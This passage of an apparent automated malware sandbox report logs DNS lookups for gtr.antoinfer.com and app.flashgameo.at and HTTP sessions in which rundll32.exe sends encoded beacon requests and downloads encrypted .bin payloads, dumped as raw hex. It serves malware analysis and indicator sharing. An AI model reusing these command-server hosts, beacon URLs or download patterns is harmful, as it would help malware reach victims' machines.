Aug 2, 2021 22:05:52.444415092 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 2, 2021 22:06:41.235661030 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:06:41.502743959 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 2, 2021 22:06:42.699810982 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:06:42.976116896 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 2, 2021 22:06:44.303113937 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:06:44.337879896 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 2, 2021 22:07:15.117455959 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:07:15.144180059 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 2, 2021 22:07:15.292063951 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:07:15.594600916 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 2, 2021 22:07:16.198416948 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:07:16.503627062 CEST	53	62938	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 22:06:41.235661030 CEST	192.168.2.3	8.8.8.8	0xb6fb	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 2, 2021 22:06:42.699810982 CEST	192.168.2.3	8.8.8.8	0xb20a	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 2, 2021 22:06:44.303113937 CEST	192.168.2.3	8.8.8.8	0x5a37	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:15.117455959 CEST	192.168.2.3	8.8.8.8	0xca7	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:15.292063951 CEST	192.168.2.3	8.8.8.8	0x8d04	Standard query (0)	app.flashgameo.at	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:16.198416948 CEST	192.168.2.3	8.8.8.8	0xeb2a	Standard query (0)	app.flashgameo.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 2, 2021 22:06:41.502743959 CEST	8.8.8.8	192.168.2.3	0xb6fb	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 2, 2021 22:06:42.976116896 CEST	8.8.8.8	192.168.2.3	0xb20a	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 2, 2021 22:06:44.337879896 CEST	8.8.8.8	192.168.2.3	0x5a37	No error (0)	gtr.antoinfer.com	185.228.233.17	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:15.144180059 CEST	8.8.8.8	192.168.2.3	0xca7	No error (0)	resolver1.opendns.com	208.67.222.222	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:15.594600916 CEST	8.8.8.8	192.168.2.3	0x8d04	No error (0)	app.flashgameo.at	185.228.233.17	A (IP address)	IN (0x0001)
Aug 2, 2021 22:07:16.503627062 CEST	8.8.8.8	192.168.2.3	0xeb2a	No error (0)	app.flashgameo.at	185.228.233.17	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

app.flashgameo.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	185.228.233.17	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 22:06:41.591708899 CEST	12167	OUT	GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 2, 2021 22:06:42.125387907 CEST	12168	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 02 Aug 2021 20:06:42 GMT Content-Type: application/octet-stream Content-Length: 194705 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="6108505214a2c.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: e7 d0 25 2c 81 7b 58 78 ac ba 6b a7 51 21 97 c4 b3 04 77 2c f7 4e cb 77 8b a5 dc 66 73 84 09 21 2a ad 9b 63 7c ac c8 38 90 82 50 88 1e e1 b4 45 2f 8e e4 46 12 b0 d8 45 4d 38 12 9e d7 a5 d1 f8 33 67 1c 01 6c 69 7f 64 ac ad 3d 22 91 e2 8f 42 0c 17 36 2a ca 8d c1 6f 32 ef cf c4 98 3c 92 50 c0 f6 29 db 18 a3 d0 f8 74 b0 42 7a b3 a1 57 cd 08 02 ab 74 eb 84 e3 aa 03 d7 21 0a cf d0 eb 3f 61 97 1d dd 2e 21 e5 61 99 e4 5e 3c 14 da 6c d8 2a 4e 04 8f 98 c3 75 4c fc 5d f4 53 86 b6 6b 14 9b 24 c2 38 fd 95 36 27 43 e6 26 1f 44 4b 24 f4 a2 7a eb e1 82 91 f9 af 85 a6 15 1a 13 c8 30 a9 15 ac 08 ca d4 34 bc 66 a6 03 91 7c 7f c7 15 b0 32 5f 16 e7 c2 f4 90 12 05 d9 5d d9 ea 6e b1 c1 80 77 d2 5d 65 ab 08 5d 63 81 5c 2c a4 9c 37 0d 26 5a 14 d7 c4 9b d3 98 3f 4c ea 05 d7 63 36 ac 3d 05 90 54 7f 94 0e d4 fd 0c 01 9a e9 78 c9 9d cc c6 2f 2f 85 e5 e5 8c ba 60 fc e2 41 68 ca 66 0d 46 1f 5f 20 a3 d0 5b f1 f3 c9 bc 18 3f e9 c7 88 de b8 66 17 f7 88 e4 8c c0 ca 4c 92 23 1c 1c 01 cd 2b af 2a eb fa 14 0b ec 60 58 1a 7c 7b 77 10 78 d8 09 b1 8f fc 40 83 65 1b ed d8 eb 6d 7c 84 36 1e 63 7c a8 71 5d 86 53 d0 19 79 4c fd 40 ec 37 f4 9f c1 22 1e bf c3 37 7f c8 20 8e 93 fd c7 4d b1 bd a6 16 f6 b4 fa 91 80 ad 86 c9 e9 5d 60 0b 16 4e 32 b7 f2 3b c8 98 a4 60 e8 12 b4 7f 2e 8a f8 b4 23 a9 4c 59 e0 50 d2 f9 b7 a8 fa b1 b6 96 a2 43 2e 1a 05 02 4d 91 a6 e6 78 1b 27 70 41 cc fc b8 b4 2f f8 51 d7 fd 56 56 e3 a0 e5 3a 8f 37 74 ab dc 2b c8 2e b4 ab 22 de 25 1d 6d d6 f5 d2 ae d0 8e 07 2f b5 8e 31 29 e5 25 5c 3b 11 6c 65 2d 59 38 5e a3 2d e1 59 b6 9c 5b c0 fa a8 70 b3 01 af 2a c8 77 4e f7 33 b1 b5 43 a8 1b 32 8f 32 c3 ae 67 01 b4 94 e1 a5 18 fb 57 53 86 11 be 0f 68 ea 85 b9 4f 04 4d 98 a8 ca e1 cb b3 43 c0 c8 7a 09 dc 10 b0 6f 35 fb ad e8 86 d5 3d 2e e5 61 51 13 92 44 c8 b1 8a d9 ee bf a7 e6 e0 1e 84 a1 59 16 26 3b cf 71 73 a6 2b 1b 75 9e 89 89 e3 d5 33 7d a1 de 43 d8 ba 68 6f 06 d7 41 1d 92 58 58 45 ad d4 e6 54 48 26 28 72 da f5 9c 4d e8 82 0c 3e 12 3a ff 01 12 1a d9 21 f9 b8 55 04 54 37 22 c8 4b 5d 5d 42 da 11 a4 b0 e2 00 03 94 e0 ac d1 0c 67 af 88 3e d7 26 2f ff 74 15 8e 78 18 77 59 c5 0d 42 72 20 53 7a f0 74 56 b6 a3 b7 49 9b 4e fe 60 fd 64 28 ae a3 1a b9 5f db ee e4 62 c7 46 71 5e 2d a1 7b 00 b1 97 5d 13 1e fd 83 b9 6c 64 31 9f 7c f9 91 ad 8f 55 58 ad b1 78 f4 d0 ce ca 42 80 b6 bf d4 02 56 90 e2 ec 91 a2 ec cf 3c e2 8a d6 6d 57 95 5f 18 68 75 89 8f d1 a3 d8 7a 6f 44 45 fb 85 87 85 ab 5e 87 72 db fe d5 46 b6 16 44 d3 c0 dd d5 1b bd f2 3f dd f6 d7 26 47 23 16 4b 12 24 3f 95 35 f4 5b 94 5e eb 2c b5 af 07 0e d1 85 d2 32 f0 2c 11 be d5 bf ad 53 9a e7 2c 7e 82 2b 36 8e 6c d1 e2 49 52 0c b2 30 de 42 95 f6 03 00 5c e0 32 b9 e4 39 d8 14 d9 05 c3 28 35 a1 85 94 ce ea b0 c3 88 a4 c9 6c 0e 58 d4 ef 57 a6 e2 0b fc dc 77 1c 14 5d 37 a8 00 3f e7 02 7d 66 ad 70 29 75 d3 Data Ascii: %,{XxkQ!w,Nwfs!c\|8PE/FEM83glid="B6o2<P)tBzWt!?a.!a^<lNuL]Sk$86'C&DK$z04f\|2_]nw]e]c\,7&Z?Lc6=Tx//`AhfF_ [?fL#+`X\|{wx@em\|6c\|q]SyL@7"7 M]`N2;`.#LYPC.Mx'pA/QVV:7t+."%m/1)%\;le-Y8^-Y[p*wN3C22gWShOMCzo5=.aQDY&;qs+u3}ChoAXXETH&(rM>:!UT7"K]]Bg>&/txwYBr SztVIN`d(_bFq^-{]ld1\|UXxBV<mW_huzoDE^rFD?&G#K$?5[^,2,S,~+6lIR0B\29(5lXWw]7?}fp)u
Aug 2, 2021 22:06:42.125442028 CEST	12170	IN	Data Raw: 30 34 24 a6 ee 16 d6 38 d8 b3 a8 f2 a2 2d 1b e5 c7 55 1b e6 e2 01 c4 c6 ed 59 84 d2 f3 5c a7 d7 4f 32 0c 3d 9b f9 45 b6 e9 c1 f0 6f 1f a4 0d 95 32 92 2c ee 31 d3 47 78 92 b3 70 55 66 5b a8 e0 08 88 0e 33 86 21 5a 9d 60 4f bd e3 8d fb a3 3f 76 da Data Ascii: 04$8-UY\O2=Eo2,1GxpUf[3!Z`O?v\|d_2*ffj9rg7@@TgEVB}@Pa9#G%Fs]w@rudwkn&<f-WTk-qp%Hp
Aug 2, 2021 22:06:42.126411915 CEST	12171	IN	Data Raw: dc e7 a0 7f 45 7a 99 e8 08 15 c8 6e b7 7f 9e 9d 3c af 08 60 3c bb 04 d9 81 30 a0 2f 55 06 4e 40 41 0d 50 f5 05 97 73 c7 42 03 eb 67 7d ac b0 e8 63 ca ed 27 70 4c 7b d7 40 19 4b e1 5e 57 1d 77 ac 30 a1 39 4f 1d 34 e9 d2 83 89 10 17 09 d0 c2 cf a3 Data Ascii: Ezn<`<0/UN@APsBg}c'pL{@K^Ww09O4lc`2=9-=9Y]@L.5^1GrFY^aKwP^p%C<QoFh.A;;8mh/701JJq[/ a_^SY*KI,O
Aug 2, 2021 22:06:42.126455069 CEST	12172	IN	Data Raw: 11 5e 1a ba 32 ff 91 be 40 8f 03 b0 e7 f5 41 7e 3c 23 05 fe dc 22 2b d9 cf 40 e8 d3 cf 53 f0 ff eb 78 ac 6c b8 1f b6 73 f1 c7 81 2b ed 32 9e 23 a9 fa 83 a7 5d 73 72 b5 23 8b 0b 80 98 53 7d 85 2b 7b 00 0b ba 5b b8 37 8c d7 37 05 28 48 34 4c d5 ff Data Ascii: ^2@A~<#"+@Sxls+2#]sr#S}+{[77(H4L%9}rwwS\\L9s@'(I~Apt+9-B\|qg(0F'XGl@&)le-F%;E%8S9<vQP(bTjhQh#e[EO
Aug 2, 2021 22:06:42.130116940 CEST	12174	IN	Data Raw: 59 ad a6 e9 9a 2a e0 fa 29 2b 80 19 1e 85 50 77 a1 9d a6 18 c6 8c b8 e1 c7 11 6c 24 10 9a 29 26 d1 5e 56 13 1b 5f 04 46 b3 4b 27 98 3d 31 59 0f b4 36 f9 ab 42 f0 8b 80 68 a3 4d fd 90 a2 44 bf ed 21 5f 87 5c 63 3a cd 94 9b 01 55 6e 9d 9d 4c 61 d3 Data Ascii: Y)+Pwl$)&^V_FK'=1Y6BhMD!_\c:UnLa7$M)7=4P4lU7wTu9LFRSfo8q7p`)5sM0j.FP!iMv%R%+x%_yBKf<tKm\:s5P}eML
Aug 2, 2021 22:06:42.130153894 CEST	12175	IN	Data Raw: 22 85 60 c8 1d 76 cb 45 06 84 2c 9c dc ae 2d 5e 50 83 67 5b 25 36 25 d0 a8 9a 86 fc c1 a2 96 74 94 d1 b1 d9 95 64 02 98 fa 6b 21 c2 68 ee ce 29 23 79 66 e5 73 6e 44 1f e1 57 46 6c c3 dd 24 87 31 43 a5 75 f6 4b c8 9d dd ca f4 a7 d4 54 73 bd f4 6f Data Ascii: "`vE,-^Pg[%6%tdk!h)#yfsnDWFl$1CuKTso{7u(O}4.:>KVF9T6,n5[QV#jw::SQ!oB2Ri9)gOt:6GBP16`idCtWZt.5i/w
Aug 2, 2021 22:06:42.135081053 CEST	12176	IN	Data Raw: dd 89 89 44 89 53 ab d1 9e a8 3b 05 c7 74 30 54 7f 9a 4e a5 0b 99 52 d6 7e c3 a2 16 5c 79 b7 6c 76 a7 a6 fd 47 87 31 56 44 2b ef 77 b6 75 a9 cb 25 06 46 f1 7d 99 c4 2d ca ca d2 e7 f6 04 b1 e1 72 ae 83 50 0b d1 93 ab 9f 32 e0 3b 8c 2b 68 d5 9f 03 Data Ascii: DS;t0TNR~\ylvG1VD+wu%F}-rP2;+h8k-17^)NxrRF)B=Cd__)f@o<FNaW-:V)pJm['pIgdm~$R%`$b.!'s,lB;W
Aug 2, 2021 22:06:42.135154009 CEST	12178	IN	Data Raw: 05 07 11 18 5d 0a 1f 7a d8 9d e1 c9 98 05 d0 4c ae af c0 89 0a 49 38 53 b0 95 6c b5 d5 3f 56 ed a8 db e6 18 5b b0 7a 98 e3 59 bf d6 2c 01 88 b9 ec c2 23 2b 01 3f 50 4c 10 e3 f4 87 74 be c2 f5 5a 5e 54 2c d6 18 a9 72 bc 65 b9 2b 17 02 10 64 52 48 Data Ascii: ]zLI8Sl?V[zY,#+?PLtZ^T,re+dRH(.-seL_Fdo}_L+V(UK{rDUk,}E94jvR@;hjFU=vA2s7#29*^bmzJ<E'[S
Aug 2, 2021 22:06:42.137670040 CEST	12179	IN	Data Raw: a0 4f af e7 fe ef b1 e6 d4 55 ff f6 d3 4c db f2 fa f1 41 d9 04 9b 1b 7b c9 21 10 d6 c9 1e 4f b6 c2 e6 9f bc a3 93 7f 24 65 a2 74 a4 58 35 18 8c fc e4 39 2e a5 9d 37 57 3c e8 c5 0a 69 47 e1 2a 49 2e d9 69 8f 09 be c9 41 6f ab 63 dc 28 5c 85 53 db Data Ascii: OULA{!O$etX59.7W<iGI.iAoc(\Sx;wf,,G5Io[},Y$Z)y&;k>e5}O^8K3u_aRJz=>%f?_Kzq,l&;~!>e?"0/ :I[??MucKkr5B}
Aug 2, 2021 22:06:42.137715101 CEST	12181	IN	Data Raw: cc ae 90 3e 4a d1 f1 16 22 72 07 56 dd e6 dd 74 d3 eb af 52 32 ef b3 9e 38 30 97 b5 76 fc a1 c1 05 eb f7 c8 4d bd aa a3 70 0b ee e5 4e ae 96 8e 5b 63 3a 0d 2f 54 d8 bd 14 96 87 cc fe 89 ba d9 68 8d 16 b1 34 11 6f 6c fd f7 5c 43 70 a1 65 3d dd 04 Data Ascii: >J"rVtR280vMpN[c:/Th4ol\Cpe=GQA>g/4O5{{3_#@&R[,)w.}YsSe>G&G$eDX!iy0I=dhjm^eARwT&Yl!5G^<<sca+ty
Aug 2, 2021 22:06:42.186408997 CEST	12182	IN	Data Raw: 33 5c 1c 78 ef fe dd 2f 3a ff 7f cd 63 37 b1 d1 cb 3d fe 31 05 92 d8 05 08 aa 2e 8c 05 db d6 55 85 31 c0 04 2c 9c 2d 56 d0 f3 30 82 aa e2 8a 22 d9 dc d5 63 7b e4 60 38 96 2d d1 f4 4c 26 f5 63 62 a6 13 ee 1e 26 5c 86 2e 27 8b 31 34 5b 3b 87 9a 4b Data Ascii: 3\x/:c7=1.U1,-V0"c{`8-L&cb&\.'14[;K,1}PtQ:!nD\XhH'x@Ki~"?/Lfn2Re=1v\<dVOy3\F~.9`$^Bq=[\V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49745	185.228.233.17	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 22:06:43.038395882 CEST	12373	OUT	GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 2, 2021 22:06:43.575387001 CEST	12375	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 02 Aug 2021 20:06:43 GMT Content-Type: application/octet-stream Content-Length: 247960 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="6108505382702.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 0b 3d b5 4c 49 5a 66 90 4d ca 5c c7 ab fd ed c5 68 33 e6 d7 75 6b 1f 78 5b 62 f6 58 24 18 cb 78 45 9b b4 60 f7 90 de a0 53 7c 67 ae e7 91 26 d9 f7 44 54 94 39 43 70 09 28 62 1a 80 c7 34 f3 bc dc 2c b6 d2 61 0d bd 59 56 a6 32 a8 97 63 b6 24 8e af 9b 0d d7 4f e8 f4 51 dc a8 2c 87 98 4e 84 7e 89 ab 69 c4 b3 0a 24 0e 72 d9 63 14 9a 63 34 46 7f 39 b7 d6 f4 7f 12 80 95 30 fe 27 7e 67 61 83 fc e0 41 7b b8 8c b0 fe fa a6 83 2e 14 06 6b f0 0c c9 41 f2 7f 0b 2c 24 9f 12 0f 48 61 80 4e 1c f4 38 7c ae 15 37 e1 05 5c 09 bf 6c fb f0 fb 56 67 ce a1 51 af e1 8a b5 d9 4f b1 8c 62 eb 9a 52 58 7f 7c f9 ae 7a f8 15 9d 0e 91 ee 9e b1 a2 e8 43 26 c0 5a 31 e8 f7 ba dd b0 7b 32 54 9a 4e f5 83 5d ea 00 42 51 c1 61 05 7c aa 4b 8a e8 8e 3f 4f 1f 1c fe 64 c5 fc 9c 46 34 d9 c9 c0 a0 c2 f8 a4 ac 21 96 e6 44 2e 5a 60 aa de 6a bf 38 58 e7 1a af bc d7 29 c7 68 50 8a 80 9c 50 99 22 58 41 5b ec 55 d3 7b 59 9b 58 2d d2 5f e7 74 fe 43 9a 8a 1c ec fc 40 64 11 4e f5 36 33 28 ad ee 4e 96 73 a8 22 f5 43 47 29 5d 8b de 9c 09 48 06 4f 27 1b 74 53 7e 4c 96 ea bc 35 42 3d 84 e9 60 4f ed 03 77 19 75 94 85 c4 bb eb 18 91 a7 42 d3 77 1a 70 0d eb ae ce 9b ca 20 b0 66 68 57 f9 5c db dc f2 77 47 1a 1e 8b 3a 4c a2 91 7e da e8 a9 c9 ad 4c b4 ee 46 19 36 27 08 c5 75 5b 93 da f8 c0 cf 73 93 25 b6 70 10 5a cd 41 5b 67 30 1c 32 47 c0 33 99 ef ab 77 3e 51 5f ac 89 14 ea 0a 39 e5 50 09 97 27 03 c9 43 1b 7d 7d 8d bf 5a 11 74 56 87 b5 4d 87 9f 66 e6 f4 08 58 3e 7e 1e e8 f6 96 5a 8e 34 bd d2 bc 11 ec a1 b8 3e ff 06 f5 d2 a9 40 10 a6 6c 99 a3 4b a3 f8 1d 54 50 4b 79 e2 e8 b4 e6 f4 a2 58 c3 e5 8c dc 4e 25 81 25 e1 3b 7d c9 b0 e7 3f 25 30 d4 c4 eb 9f 28 fe ad d6 47 76 9d 6d d3 f6 3d cc 3c 63 11 83 2d 17 be dc 80 f0 a1 50 d4 21 50 7a 64 24 e0 e3 c8 4a 91 34 c4 b6 2f 27 39 fa 2e ca c5 af 8e 9c 49 07 5f c2 7e 3d 9a 16 56 b2 c1 3b c6 97 2c a2 45 19 04 f5 39 9c 47 c0 1e c8 56 41 30 35 a2 12 76 4b d9 ba 14 d0 9d 00 d1 b9 2f 0d 04 c0 31 a7 55 75 6d 6d 2f e3 65 91 0d c5 35 1b 85 c6 22 c5 6a 8b b0 8e 3e da 62 15 58 a0 80 41 0c db 39 88 d3 b8 e6 04 d4 89 da 0c 36 ea f0 ba e5 2e 36 45 c0 32 5e d4 e9 d1 d2 6a 61 91 0a 7e 85 7b 8f 03 de 9e bb 99 1c 44 06 8d 9f 96 e6 93 81 f5 86 59 30 d4 48 1b f4 c3 7f 79 70 16 1e 2e 90 19 4e 3c 60 05 e5 ea 44 29 da 63 11 63 52 73 9a d9 2b 29 82 7d 7e 96 17 86 cd b8 ef b1 cb 79 8a 6d 38 dc 56 2a 0c 4f ac 3d b8 d9 6d 0f 6f 21 b0 68 ab 2e 21 5e 05 1f d6 e7 29 d1 ea 8e 6c 17 9b 02 a3 71 85 f6 fa 00 01 67 a8 da ef 4d 34 49 b3 d9 94 2a 9e 41 d7 54 4a 5c d1 32 65 8e cf c7 66 a3 56 ed e4 ba c4 5d 34 91 3d 82 bb b3 db d1 a9 85 0e 36 6a f9 a9 6c 39 2d c7 ec 3c dc 85 d0 15 bb e0 6c 45 e6 71 55 c5 1d 46 73 f7 f3 32 92 1a 03 cd cc c7 ca 6e bc 8a 67 de 5a a1 6a 3e e1 b9 dd 4e 1c cf 62 33 f1 63 bd 77 b6 8c 23 a4 d1 f3 e1 07 0a b4 3b b5 01 e9 ed 78 51 c8 7a e5 dc 3a Data Ascii: =LIZfM\h3ukx[bX$xE`S\|g&DT9Cp(b4,aYV2c$OQ,N~i$rcc4F90'~gaA{.kA,$HaN8\|7\lVgQObRX\|zC&Z1{2TN]BQa\|K?OdF4!D.Z`j8X)hPP"XA[U{YX-_tC@dN63(Ns"CG)]HO'tS~L5B=`OwuBwp fhW\wG:L~LF6'u[s%pZA[g02G3w>Q_9P'C}}ZtVMfX>~Z4>@lKTPKyXN%%;}?%0(Gvm=<c-P!Pzd$J4/'9.I_~=V;,E9GVA05vK/1Uumm/e5"j>bXA96.6E2^ja~{DY0Hyp.N<`D)ccRs+)}~ym8VO=mo!h.!^)lqgM4IATJ\2efV]4=6jl9-<lEqUFs2ngZj>Nb3cw#;xQz:
Aug 2, 2021 22:06:43.575453043 CEST	12376	IN	Data Raw: 8a b3 3c 80 f3 05 32 62 fe 74 ea 36 54 c9 83 18 58 e7 db de 9d ac f6 4a d6 53 fa fe ec b4 85 4e 68 98 19 9d a6 52 58 19 9c 50 2d a0 6f 1b 84 9d 7f 46 d3 7b 35 f6 11 2d 3c 97 c2 da 5a c7 4f 25 94 0c ef 6d 34 01 0b a2 b0 6e f0 28 78 bd 04 37 7c d3 Data Ascii: <2bt6TXJSNhRXP-oF{5-<ZO%m4n(x7\|WR'6G.bzAjK9m9,r28xj"2{\9d[O{OWA5V]_(0W`)_N`JbO2@hzS/
Aug 2, 2021 22:06:43.576416016 CEST	12377	IN	Data Raw: a3 0b be 56 fe 99 13 92 9e 30 f0 6c 92 15 1b 0b 84 5e 53 0a d8 4b 9c 4d d4 5a 81 d6 17 fb ac f5 9f e7 aa d4 98 86 5e 9b 78 26 5f ad db b7 f9 df 34 cb f4 15 ae 76 0a c3 8c 45 b7 31 65 ac ea 3e 0b a9 b2 3f cf 9c 01 2b 3a 82 a8 4d 89 d0 65 23 9c cd Data Ascii: V0l^SKMZ^x&_4vE1e>?+:Me#Bx{VS(MJ:\aHZf~>$l?Q^\jnY)A~Gx@d[t+4O?(Zcnt)dGz07Z@,M iW#}'TcT!$u
Aug 2, 2021 22:06:43.576476097 CEST	12379	IN	Data Raw: 9e 25 0c 58 29 05 62 7a 45 cf ba ee 8b 9d a9 31 ed 7e 6a 43 cf 19 c6 cc e3 a8 94 47 e9 46 de dc e7 6f f5 42 ab b7 30 0c 31 bc 31 db 00 4e 7e db 12 11 74 41 94 a0 99 70 46 6f b5 f9 68 db 90 5a f6 32 be 7f 48 3e 2d 8f c2 b4 36 fa 41 e6 9d 4c bb 31 Data Ascii: %X)bzE1~jCGFoB011N~tApFohZ2H>-6AL1KqZ#!;LJvC$,g]yBQ2#5eoo#igM 0l;G5,`X-dp\|xKc9Jpk$%f$SFb$<W4h8-
Aug 2, 2021 22:06:43.578926086 CEST	12380	IN	Data Raw: 04 fa a2 91 97 10 a9 18 0c b2 3f b8 77 45 4a c0 fb 07 ea eb 31 d8 03 49 eb 36 0a 99 49 38 ea b6 fd 2b 7b 15 7f b6 fe 28 84 c4 cd f7 a7 e2 b4 6b e1 6f 43 f0 82 89 73 00 cc b9 c0 d9 53 c2 da ae 58 2a b4 d5 43 c7 ab 4a d8 7d f4 fa 02 5f 99 4c 13 00 Data Ascii: ?wEJ1I6I8+{(koCsSXCJ}_L:G\hzUhYkwW/}y\|@%r4c(V$Q\|h)iXF+y-qUpqN1V#>k4\|RF!kd ]d>8
Aug 2, 2021 22:06:43.580087900 CEST	12382	IN	Data Raw: f0 78 92 24 8a 0c ab 35 ec 82 c4 b4 7e da bc c8 a6 84 7a 1a 35 b1 78 48 e1 9f 48 09 30 ef 2b 7c 6b af da 2c b0 68 08 da 90 33 07 4a 09 b6 dc 69 0a 78 67 63 c0 26 1f ad eb f3 16 4a 30 0d 9e b9 a9 81 2a 95 47 ec aa f2 f7 8f 7e 3c 72 c6 8d 34 12 6a Data Ascii: x$5~z5xHH0+\|k,h3Jixgc&J0*G~<r4j+CYE{Vey5Dj>~v\pNRf(U(+v"oFud~D\X%v?=&\KpcHgY"(hK1#'GtIP'B
Aug 2, 2021 22:06:43.581146002 CEST	12383	IN	Data Raw: d0 a3 f3 b6 7d e7 1a e2 be f9 96 fd df 38 60 1d cb 21 29 73 ad 42 ef d4 a8 54 e6 cb 33 10 4e af ef 95 6e c3 7a 78 b3 db 10 ad a9 00 f8 4d 6b 8e eb f8 48 b1 1f ea 40 10 65 86 c6 99 09 fc 29 c3 15 04 62 93 d4 a9 90 53 d8 b3 9a 34 3b 24 d1 a5 bb cc Data Ascii: }8`!)sBT3NnzxMkH@e)bS4;$fmqs=-SK+0<D^p\\|gVb4\|I1afplV!Re$Y6 iJn8kbceVS*zJ97+z_Kvl@M:\y-Eti{^1V9
Aug 2, 2021 22:06:43.582367897 CEST	12384	IN	Data Raw: c2 5d 28 1a 4b a6 a6 c2 33 70 ed 24 34 3f 29 f8 43 3d a7 cd 59 65 a7 30 19 c0 75 b9 14 bb 13 60 3d dc fb 54 aa d5 bb 6b d3 b0 da 77 e8 55 55 50 7b 09 35 ba 89 d0 d3 40 64 71 35 7f a9 08 89 53 ca 66 71 a2 c7 91 0f ce 38 09 6d 4e 2d 6e 02 69 b1 29 Data Ascii: ](K3p$4?)C=Ye0u`=TkwUUP{5@dq5Sfq8mN-ni)z;*J[A+':jS~puEDP;w*}C,11>s~}/%FuAM,RQ~J<~OM!"o#Zk9n-;C^P[C-$\|
Aug 2, 2021 22:06:43.583523035 CEST	12386	IN	Data Raw: 68 ac 0d b6 a5 b5 dc c6 df bf df 9e 8e e5 ed f3 10 cc f1 aa 47 40 5b 33 43 d2 d9 31 7b d6 40 db a5 6b 10 7c a3 29 ed b3 d8 dd 6a be 3c 5b fe 1c e9 5c ab d6 6e d1 4e 54 1d 3b 32 69 c0 66 7b 1d a4 a0 6d 5a f9 e8 fa 32 af d0 c0 4e 33 a7 4a 9a 0c 64 Data Ascii: hG@[3C1{@k\|)j<[\nNT;2if{mZ2N3Jd\NJS\pRIMiQ60>Zb~lI$l9ygbhvUFh)R)c+6YZ.x0EPF=+*'6!\nacTkta:IXNc
Aug 2, 2021 22:06:43.583560944 CEST	12387	IN	Data Raw: f2 58 e7 d3 f7 cb e8 62 06 43 05 9b a3 c0 a8 7d 09 c6 c5 8c 12 74 04 a3 29 32 08 33 8e b0 01 bf cf db 12 c6 d4 a0 e1 b6 9e 4e 63 58 27 67 f6 7a da d8 21 b6 1b ee 57 2e c0 99 bd 58 18 84 ab 74 fa 6d c2 bf bb b5 a9 4d 3d fd 84 da 65 1e 21 ee 0a a8 Data Ascii: XbC}t)23NcX'gz!W.XtmM=e!qSJ!+E}[BWp/%}c@9C$&ND^HWqGQ1chC;&eg^oe\|vg1YS,)<k[@#mK7[l*y :
